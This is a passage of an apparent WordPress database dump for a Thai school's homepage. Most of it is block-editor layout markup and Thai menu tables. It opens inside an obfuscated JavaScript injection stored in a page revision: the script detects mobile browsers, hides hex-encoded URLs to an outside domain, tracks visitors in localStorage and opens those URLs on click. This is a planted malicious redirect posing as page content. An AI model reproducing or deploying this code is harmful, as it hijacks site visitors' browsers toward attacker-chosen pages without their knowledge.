|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:05:45','2024-07-27 05:05:45','',14,'http://pakhaeng.ssk.in.th/?p=129',0,'revision','',0),
(130,1,'2024-07-27 12:06:16','2024-07-27 05:06:16','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 